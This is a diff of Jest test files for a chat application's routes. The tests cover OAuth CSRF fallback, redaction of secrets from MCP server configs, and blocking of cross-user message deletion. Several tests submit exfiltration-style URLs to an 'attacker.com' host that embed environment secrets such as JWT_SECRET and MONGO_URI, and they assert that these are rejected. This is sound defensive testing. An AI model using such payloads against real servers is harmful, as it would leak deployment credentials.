jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
|
||||||
logAxiosError: jest.fn(),
|
jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough());
|
||||||
}));
|
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
|
||||||
|
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
|
||||||
jest.mock('@librechat/data-schemas', () => ({
|
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
|
||||||
logger: {
|
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
|
||||||
debug: jest.fn(),
|
jest.mock('multer', () => require(MOCKS).multerLib());
|
||||||
info: jest.fn(),
|
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
|
||||||
warn: jest.fn(),
|
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
|
||||||
error: jest.fn(),
|
|
||||||
},
|
|
||||||
createModels: jest.fn(() => ({
|
|
||||||
User: {},
|
|
||||||
Conversation: {},
|
|
||||||
Message: {},
|
|
||||||
SharedLink: {},
|
|
||||||
})),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/models/Conversation', () => ({
|
|
||||||
getConvosByCursor: jest.fn(),
|
|
||||||
getConvo: jest.fn(),
|
|
||||||
deleteConvos: jest.fn(),
|
|
||||||
saveConvo: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/models/ToolCall', () => ({
|
|
||||||
deleteToolCalls: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/models', () => ({
|
|
||||||
deleteAllSharedLinks: jest.fn(),
|
|
||||||
deleteConvoSharedLink: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
|
|
||||||
|
|
||||||
jest.mock('~/server/middleware', () => ({
|
|
||||||
createImportLimiters: jest.fn(() => ({
|
|
||||||
importIpLimiter: (req, res, next) => next(),
|
|
||||||
importUserLimiter: (req, res, next) => next(),
|
|
||||||
})),
|
|
||||||
createForkLimiters: jest.fn(() => ({
|
|
||||||
forkIpLimiter: (req, res, next) => next(),
|
|
||||||
forkUserLimiter: (req, res, next) => next(),
|
|
||||||
})),
|
|
||||||
configMiddleware: (req, res, next) => next(),
|
|
||||||
validateConvoAccess: (req, res, next) => next(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/server/utils/import/fork', () => ({
|
|
||||||
forkConversation: jest.fn(),
|
|
||||||
duplicateConversation: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/server/utils/import', () => ({
|
|
||||||
importConversations: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/cache/getLogStores', () => jest.fn());
|
|
||||||
|
|
||||||
jest.mock('~/server/routes/files/multer', () => ({
|
|
||||||
storage: {},
|
|
||||||
importFileFilter: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('multer', () => {
|
|
||||||
return jest.fn(() => ({
|
|
||||||
single: jest.fn(() => (req, res, next) => {
|
|
||||||
req.file = { path: '/tmp/test-file.json' };
|
|
||||||
next();
|
|
||||||
}),
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
|
|
||||||
jest.mock('librechat-data-provider', () => ({
|
|
||||||
CacheKeys: {
|
|
||||||
GEN_TITLE: 'GEN_TITLE',
|
|
||||||
},
|
|
||||||
EModelEndpoint: {
|
|
||||||
azureAssistants: 'azureAssistants',
|
|
||||||
assistants: 'assistants',
|
|
||||||
},
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/server/services/Endpoints/azureAssistants', () => ({
|
|
||||||
initializeClient: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('~/server/services/Endpoints/assistants', () => ({
|
|
||||||
initializeClient: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
describe('Convos Routes', () => {
|
describe('Convos Routes', () => {
|
||||||
let app;
|
let app;
|
||||||
|
|
|
||||||
|
|
@ -32,6 +32,9 @@ jest.mock('@librechat/api', () => {
|
||||||
getFlowState: jest.fn(),
|
getFlowState: jest.fn(),
|
||||||
completeOAuthFlow: jest.fn(),
|
completeOAuthFlow: jest.fn(),
|
||||||
generateFlowId: jest.fn(),
|
generateFlowId: jest.fn(),
|
||||||
|
resolveStateToFlowId: jest.fn(async (state) => state),
|
||||||
|
storeStateMapping: jest.fn(),
|
||||||
|
deleteStateMapping: jest.fn(),
|
||||||
},
|
},
|
||||||
MCPTokenStorage: {
|
MCPTokenStorage: {
|
||||||
storeTokens: jest.fn(),
|
storeTokens: jest.fn(),
|
||||||
|
|
@ -180,7 +183,10 @@ describe('MCP Routes', () => {
|
||||||
MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
|
MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
|
||||||
authorizationUrl: 'https://oauth.example.com/auth',
|
authorizationUrl: 'https://oauth.example.com/auth',
|
||||||
flowId: 'test-user-id:test-server',
|
flowId: 'test-user-id:test-server',
|
||||||
|
flowMetadata: { state: 'random-state-value' },
|
||||||
});
|
});
|
||||||
|
MCPOAuthHandler.storeStateMapping.mockResolvedValue();
|
||||||
|
mockFlowManager.initFlow = jest.fn().mockResolvedValue();
|
||||||
|
|
||||||
const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
|
const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
|
||||||
userId: 'test-user-id',
|
userId: 'test-user-id',
|
||||||
|
|
@ -367,6 +373,121 @@ describe('MCP Routes', () => {
|
||||||
expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
|
expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('CSRF fallback via active PENDING flow', () => {
|
||||||
|
it('should proceed when a fresh PENDING flow exists and no cookies are present', async () => {
|
||||||
|
const flowId = 'test-user-id:test-server';
|
||||||
|
const mockFlowManager = {
|
||||||
|
getFlowState: jest.fn().mockResolvedValue({
|
||||||
|
status: 'PENDING',
|
||||||
|
createdAt: Date.now(),
|
||||||
|
}),
|
||||||
|
completeFlow: jest.fn().mockResolvedValue(true),
|
||||||
|
deleteFlow: jest.fn().mockResolvedValue(true),
|
||||||
|
};
|
||||||
|
const mockFlowState = {
|
||||||
|
serverName: 'test-server',
|
||||||
|
userId: 'test-user-id',
|
||||||
|
metadata: {},
|
||||||
|
clientInfo: {},
|
||||||
|
codeVerifier: 'test-verifier',
|
||||||
|
};
|
||||||
|
|
||||||
|
getLogStores.mockReturnValue({});
|
||||||
|
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
|
||||||
|
MCPOAuthHandler.getFlowState.mockResolvedValue(mockFlowState);
|
||||||
|
MCPOAuthHandler.completeOAuthFlow.mockResolvedValue({
|
||||||
|
access_token: 'test-token',
|
||||||
|
});
|
||||||
|
MCPTokenStorage.storeTokens.mockResolvedValue();
|
||||||
|
mockRegistryInstance.getServerConfig.mockResolvedValue({});
|
||||||
|
|
||||||
|
const mockMcpManager = {
|
||||||
|
getUserConnection: jest.fn().mockResolvedValue({
|
||||||
|
fetchTools: jest.fn().mockResolvedValue([]),
|
||||||
|
}),
|
||||||
|
};
|
||||||
|
require('~/config').getMCPManager.mockReturnValue(mockMcpManager);
|
||||||
|
require('~/config').getOAuthReconnectionManager.mockReturnValue({
|
||||||
|
clearReconnection: jest.fn(),
|
||||||
|
});
|
||||||
|
require('~/server/services/Config/mcp').updateMCPServerTools.mockResolvedValue();
|
||||||
|
|
||||||
|
const response = await request(app)
|
||||||
|
.get('/api/mcp/test-server/oauth/callback')
|
||||||
|
.query({ code: 'test-code', state: flowId });
|
||||||
|
|
||||||
|
const basePath = getBasePath();
|
||||||
|
expect(response.status).toBe(302);
|
||||||
|
expect(response.headers.location).toContain(`${basePath}/oauth/success`);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject when no PENDING flow exists and no cookies are present', async () => {
|
||||||
|
const flowId = 'test-user-id:test-server';
|
||||||
|
const mockFlowManager = {
|
||||||
|
getFlowState: jest.fn().mockResolvedValue(null),
|
||||||
|
};
|
||||||
|
|
||||||
|
getLogStores.mockReturnValue({});
|
||||||
|
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
|
||||||
|
|
||||||
|
const response = await request(app)
|
||||||
|
.get('/api/mcp/test-server/oauth/callback')
|
||||||
|
.query({ code: 'test-code', state: flowId });
|
||||||
|
|
||||||
|
const basePath = getBasePath();
|
||||||
|
expect(response.status).toBe(302);
|
||||||
|
expect(response.headers.location).toBe(
|
||||||
|
`${basePath}/oauth/error?error=csrf_validation_failed`,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
|
||||||
|
const flowId = 'test-user-id:test-server';
|
||||||
|
const mockFlowManager = {
|
||||||
|
getFlowState: jest.fn().mockResolvedValue({
|
||||||
|
status: 'COMPLETED',
|
||||||
|
createdAt: Date.now(),
|
||||||
|
}),
|
||||||
|
};
|
||||||
|
|
||||||
|
getLogStores.mockReturnValue({});
|
||||||
|
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
|
||||||
|
|
||||||
|
const response = await request(app)
|
||||||
|
.get('/api/mcp/test-server/oauth/callback')
|
||||||
|
.query({ code: 'test-code', state: flowId });
|
||||||
|
|
||||||
|
const basePath = getBasePath();
|
||||||
|
expect(response.status).toBe(302);
|
||||||
|
expect(response.headers.location).toBe(
|
||||||
|
`${basePath}/oauth/error?error=csrf_validation_failed`,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
|
||||||
|
const flowId = 'test-user-id:test-server';
|
||||||
|
const mockFlowManager = {
|
||||||
|
getFlowState: jest.fn().mockResolvedValue({
|
||||||
|
status: 'PENDING',
|
||||||
|
createdAt: Date.now() - 3 * 60 * 1000,
|
||||||
|
}),
|
||||||
|
};
|
||||||
|
|
||||||
|
getLogStores.mockReturnValue({});
|
||||||
|
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
|
||||||
|
|
||||||
|
const response = await request(app)
|
||||||
|
.get('/api/mcp/test-server/oauth/callback')
|
||||||
|
.query({ code: 'test-code', state: flowId });
|
||||||
|
|
||||||
|
const basePath = getBasePath();
|
||||||
|
expect(response.status).toBe(302);
|
||||||
|
expect(response.headers.location).toBe(
|
||||||
|
`${basePath}/oauth/error?error=csrf_validation_failed`,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
it('should handle OAuth callback successfully', async () => {
|
it('should handle OAuth callback successfully', async () => {
|
||||||
// mockRegistryInstance is defined at the top of the file
|
// mockRegistryInstance is defined at the top of the file
|
||||||
const mockFlowManager = {
|
const mockFlowManager = {
|
||||||
|
|
@ -1572,12 +1693,14 @@ describe('MCP Routes', () => {
|
||||||
it('should return all server configs for authenticated user', async () => {
|
it('should return all server configs for authenticated user', async () => {
|
||||||
const mockServerConfigs = {
|
const mockServerConfigs = {
|
||||||
'server-1': {
|
'server-1': {
|
||||||
endpoint: 'http://server1.com',
|
type: 'sse',
|
||||||
name: 'Server 1',
|
url: 'http://server1.com/sse',
|
||||||
|
title: 'Server 1',
|
||||||
},
|
},
|
||||||
'server-2': {
|
'server-2': {
|
||||||
endpoint: 'http://server2.com',
|
type: 'sse',
|
||||||
name: 'Server 2',
|
url: 'http://server2.com/sse',
|
||||||
|
title: 'Server 2',
|
||||||
},
|
},
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|
@ -1586,7 +1709,18 @@ describe('MCP Routes', () => {
|
||||||
const response = await request(app).get('/api/mcp/servers');
|
const response = await request(app).get('/api/mcp/servers');
|
||||||
|
|
||||||
expect(response.status).toBe(200);
|
expect(response.status).toBe(200);
|
||||||
expect(response.body).toEqual(mockServerConfigs);
|
expect(response.body['server-1']).toMatchObject({
|
||||||
|
type: 'sse',
|
||||||
|
url: 'http://server1.com/sse',
|
||||||
|
title: 'Server 1',
|
||||||
|
});
|
||||||
|
expect(response.body['server-2']).toMatchObject({
|
||||||
|
type: 'sse',
|
||||||
|
url: 'http://server2.com/sse',
|
||||||
|
title: 'Server 2',
|
||||||
|
});
|
||||||
|
expect(response.body['server-1'].headers).toBeUndefined();
|
||||||
|
expect(response.body['server-2'].headers).toBeUndefined();
|
||||||
expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
|
expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
|
@ -1641,10 +1775,10 @@ describe('MCP Routes', () => {
|
||||||
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
|
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
|
||||||
|
|
||||||
expect(response.status).toBe(201);
|
expect(response.status).toBe(201);
|
||||||
expect(response.body).toEqual({
|
expect(response.body.serverName).toBe('test-sse-server');
|
||||||
serverName: 'test-sse-server',
|
expect(response.body.type).toBe('sse');
|
||||||
...validConfig,
|
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
|
||||||
});
|
expect(response.body.title).toBe('Test SSE Server');
|
||||||
expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
|
expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
|
||||||
'temp_server_name',
|
'temp_server_name',
|
||||||
expect.objectContaining({
|
expect.objectContaining({
|
||||||
|
|
@ -1698,6 +1832,78 @@ describe('MCP Routes', () => {
|
||||||
expect(response.body.message).toBe('Invalid configuration');
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should reject SSE URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.post('/api/mcp/servers')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'sse',
|
||||||
|
url: 'http://attacker.com/?secret=${JWT_SECRET}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject streamable-http URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.post('/api/mcp/servers')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'streamable-http',
|
||||||
|
url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject websocket URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.post('/api/mcp/servers')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'websocket',
|
||||||
|
url: 'ws://attacker.com/?secret=${MONGO_URI}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should redact secrets from create response', async () => {
|
||||||
|
const validConfig = {
|
||||||
|
type: 'sse',
|
||||||
|
url: 'https://mcp-server.example.com/sse',
|
||||||
|
title: 'Test Server',
|
||||||
|
};
|
||||||
|
|
||||||
|
mockRegistryInstance.addServer.mockResolvedValue({
|
||||||
|
serverName: 'test-server',
|
||||||
|
config: {
|
||||||
|
...validConfig,
|
||||||
|
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
|
||||||
|
oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
|
||||||
|
headers: { Authorization: 'Bearer leaked-token' },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
|
||||||
|
|
||||||
|
expect(response.status).toBe(201);
|
||||||
|
expect(response.body.apiKey?.key).toBeUndefined();
|
||||||
|
expect(response.body.oauth?.client_secret).toBeUndefined();
|
||||||
|
expect(response.body.headers).toBeUndefined();
|
||||||
|
expect(response.body.apiKey?.source).toBe('admin');
|
||||||
|
expect(response.body.oauth?.client_id).toBe('cid');
|
||||||
|
});
|
||||||
|
|
||||||
it('should return 500 when registry throws error', async () => {
|
it('should return 500 when registry throws error', async () => {
|
||||||
const validConfig = {
|
const validConfig = {
|
||||||
type: 'sse',
|
type: 'sse',
|
||||||
|
|
@ -1727,7 +1933,9 @@ describe('MCP Routes', () => {
|
||||||
const response = await request(app).get('/api/mcp/servers/test-server');
|
const response = await request(app).get('/api/mcp/servers/test-server');
|
||||||
|
|
||||||
expect(response.status).toBe(200);
|
expect(response.status).toBe(200);
|
||||||
expect(response.body).toEqual(mockConfig);
|
expect(response.body.type).toBe('sse');
|
||||||
|
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
|
||||||
|
expect(response.body.title).toBe('Test Server');
|
||||||
expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
|
expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
|
||||||
'test-server',
|
'test-server',
|
||||||
'test-user-id',
|
'test-user-id',
|
||||||
|
|
@ -1743,6 +1951,29 @@ describe('MCP Routes', () => {
|
||||||
expect(response.body).toEqual({ message: 'MCP server not found' });
|
expect(response.body).toEqual({ message: 'MCP server not found' });
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should redact secrets from get response', async () => {
|
||||||
|
mockRegistryInstance.getServerConfig.mockResolvedValue({
|
||||||
|
type: 'sse',
|
||||||
|
url: 'https://mcp-server.example.com/sse',
|
||||||
|
title: 'Secret Server',
|
||||||
|
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' },
|
||||||
|
oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' },
|
||||||
|
headers: { Authorization: 'Bearer internal-token' },
|
||||||
|
oauth_headers: { 'X-OAuth': 'secret-value' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const response = await request(app).get('/api/mcp/servers/secret-server');
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(response.body.title).toBe('Secret Server');
|
||||||
|
expect(response.body.apiKey?.key).toBeUndefined();
|
||||||
|
expect(response.body.apiKey?.source).toBe('admin');
|
||||||
|
expect(response.body.oauth?.client_secret).toBeUndefined();
|
||||||
|
expect(response.body.oauth?.client_id).toBe('cid');
|
||||||
|
expect(response.body.headers).toBeUndefined();
|
||||||
|
expect(response.body.oauth_headers).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
it('should return 500 when registry throws error', async () => {
|
it('should return 500 when registry throws error', async () => {
|
||||||
mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
|
mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
|
||||||
|
|
||||||
|
|
@ -1769,7 +2000,9 @@ describe('MCP Routes', () => {
|
||||||
.send({ config: updatedConfig });
|
.send({ config: updatedConfig });
|
||||||
|
|
||||||
expect(response.status).toBe(200);
|
expect(response.status).toBe(200);
|
||||||
expect(response.body).toEqual(updatedConfig);
|
expect(response.body.type).toBe('sse');
|
||||||
|
expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse');
|
||||||
|
expect(response.body.title).toBe('Updated Server');
|
||||||
expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
|
expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
|
||||||
'test-server',
|
'test-server',
|
||||||
expect.objectContaining({
|
expect.objectContaining({
|
||||||
|
|
@ -1781,6 +2014,35 @@ describe('MCP Routes', () => {
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should redact secrets from update response', async () => {
|
||||||
|
const validConfig = {
|
||||||
|
type: 'sse',
|
||||||
|
url: 'https://mcp-server.example.com/sse',
|
||||||
|
title: 'Updated Server',
|
||||||
|
};
|
||||||
|
|
||||||
|
mockRegistryInstance.updateServer.mockResolvedValue({
|
||||||
|
...validConfig,
|
||||||
|
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' },
|
||||||
|
oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' },
|
||||||
|
headers: { Authorization: 'Bearer internal-token' },
|
||||||
|
env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' },
|
||||||
|
});
|
||||||
|
|
||||||
|
const response = await request(app)
|
||||||
|
.patch('/api/mcp/servers/test-server')
|
||||||
|
.send({ config: validConfig });
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(response.body.title).toBe('Updated Server');
|
||||||
|
expect(response.body.apiKey?.key).toBeUndefined();
|
||||||
|
expect(response.body.apiKey?.source).toBe('admin');
|
||||||
|
expect(response.body.oauth?.client_secret).toBeUndefined();
|
||||||
|
expect(response.body.oauth?.client_id).toBe('cid');
|
||||||
|
expect(response.body.headers).toBeUndefined();
|
||||||
|
expect(response.body.env).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
it('should return 400 for invalid configuration', async () => {
|
it('should return 400 for invalid configuration', async () => {
|
||||||
const invalidConfig = {
|
const invalidConfig = {
|
||||||
type: 'sse',
|
type: 'sse',
|
||||||
|
|
@ -1797,6 +2059,51 @@ describe('MCP Routes', () => {
|
||||||
expect(response.body.errors).toBeDefined();
|
expect(response.body.errors).toBeDefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should reject SSE URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.patch('/api/mcp/servers/test-server')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'sse',
|
||||||
|
url: 'http://attacker.com/?secret=${JWT_SECRET}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject streamable-http URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.patch('/api/mcp/servers/test-server')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'streamable-http',
|
||||||
|
url: 'http://attacker.com/?key=${CREDS_KEY}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should reject websocket URL containing env variable references', async () => {
|
||||||
|
const response = await request(app)
|
||||||
|
.patch('/api/mcp/servers/test-server')
|
||||||
|
.send({
|
||||||
|
config: {
|
||||||
|
type: 'websocket',
|
||||||
|
url: 'ws://attacker.com/?secret=${MONGO_URI}',
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(400);
|
||||||
|
expect(response.body.message).toBe('Invalid configuration');
|
||||||
|
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
it('should return 500 when registry throws error', async () => {
|
it('should return 500 when registry throws error', async () => {
|
||||||
const validConfig = {
|
const validConfig = {
|
||||||
type: 'sse',
|
type: 'sse',
|
||||||
|
|
|
||||||
200
api/server/routes/__tests__/messages-delete.spec.js
Normal file
200
api/server/routes/__tests__/messages-delete.spec.js
Normal file
|
|
@ -0,0 +1,200 @@
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const express = require('express');
|
||||||
|
const request = require('supertest');
|
||||||
|
const { v4: uuidv4 } = require('uuid');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
|
||||||
|
jest.mock('@librechat/agents', () => ({
|
||||||
|
sleep: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
unescapeLaTeX: jest.fn((x) => x),
|
||||||
|
countTokens: jest.fn().mockResolvedValue(10),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
...jest.requireActual('@librechat/data-schemas'),
|
||||||
|
logger: {
|
||||||
|
debug: jest.fn(),
|
||||||
|
info: jest.fn(),
|
||||||
|
warn: jest.fn(),
|
||||||
|
error: jest.fn(),
|
||||||
|
},
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('librechat-data-provider', () => ({
|
||||||
|
...jest.requireActual('librechat-data-provider'),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
saveConvo: jest.fn(),
|
||||||
|
getMessage: jest.fn(),
|
||||||
|
saveMessage: jest.fn(),
|
||||||
|
getMessages: jest.fn(),
|
||||||
|
updateMessage: jest.fn(),
|
||||||
|
deleteMessages: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Artifacts/update', () => ({
|
||||||
|
findAllArtifacts: jest.fn(),
|
||||||
|
replaceArtifactContent: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
|
||||||
|
|
||||||
|
jest.mock('~/server/middleware', () => ({
|
||||||
|
requireJwtAuth: (req, res, next) => next(),
|
||||||
|
validateMessageReq: (req, res, next) => next(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Conversation', () => ({
|
||||||
|
getConvosQueried: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/db/models', () => ({
|
||||||
|
Message: {
|
||||||
|
findOne: jest.fn(),
|
||||||
|
find: jest.fn(),
|
||||||
|
meiliSearch: jest.fn(),
|
||||||
|
},
|
||||||
|
}));
|
||||||
|
|
||||||
|
/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */
|
||||||
|
|
||||||
|
const { messageSchema } = require('@librechat/data-schemas');
|
||||||
|
|
||||||
|
describe('deleteMessages – model-level IDOR prevention', () => {
|
||||||
|
let mongoServer;
|
||||||
|
let Message;
|
||||||
|
|
||||||
|
const ownerUserId = 'user-owner-111';
|
||||||
|
const attackerUserId = 'user-attacker-222';
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
Message = mongoose.models.Message || mongoose.model('Message', messageSchema);
|
||||||
|
await mongoose.connect(mongoServer.getUri());
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await Message.deleteMany({});
|
||||||
|
});
|
||||||
|
|
||||||
|
it("should NOT delete another user's message when attacker supplies victim messageId", async () => {
|
||||||
|
const conversationId = uuidv4();
|
||||||
|
const victimMsgId = 'victim-msg-001';
|
||||||
|
|
||||||
|
await Message.create({
|
||||||
|
messageId: victimMsgId,
|
||||||
|
conversationId,
|
||||||
|
user: ownerUserId,
|
||||||
|
text: 'Sensitive owner data',
|
||||||
|
});
|
||||||
|
|
||||||
|
await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId });
|
||||||
|
|
||||||
|
const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean();
|
||||||
|
expect(victimMsg).not.toBeNull();
|
||||||
|
expect(victimMsg.user).toBe(ownerUserId);
|
||||||
|
expect(victimMsg.text).toBe('Sensitive owner data');
|
||||||
|
});
|
||||||
|
|
||||||
|
it("should delete the user's own message", async () => {
|
||||||
|
const conversationId = uuidv4();
|
||||||
|
const ownMsgId = 'own-msg-001';
|
||||||
|
|
||||||
|
await Message.create({
|
||||||
|
messageId: ownMsgId,
|
||||||
|
conversationId,
|
||||||
|
user: ownerUserId,
|
||||||
|
text: 'My message',
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId });
|
||||||
|
expect(result.deletedCount).toBe(1);
|
||||||
|
|
||||||
|
const deleted = await Message.findOne({ messageId: ownMsgId }).lean();
|
||||||
|
expect(deleted).toBeNull();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should scope deletion by conversationId, messageId, and user together', async () => {
|
||||||
|
const convoA = uuidv4();
|
||||||
|
const convoB = uuidv4();
|
||||||
|
|
||||||
|
await Message.create([
|
||||||
|
{ messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' },
|
||||||
|
{ messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' },
|
||||||
|
]);
|
||||||
|
|
||||||
|
await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId });
|
||||||
|
|
||||||
|
const remaining = await Message.find({ user: ownerUserId }).lean();
|
||||||
|
expect(remaining).toHaveLength(2);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
/* ─── Route-level tests: supertest + mocked deleteMessages ─── */
|
||||||
|
|
||||||
|
describe('DELETE /:conversationId/:messageId – route handler', () => {
|
||||||
|
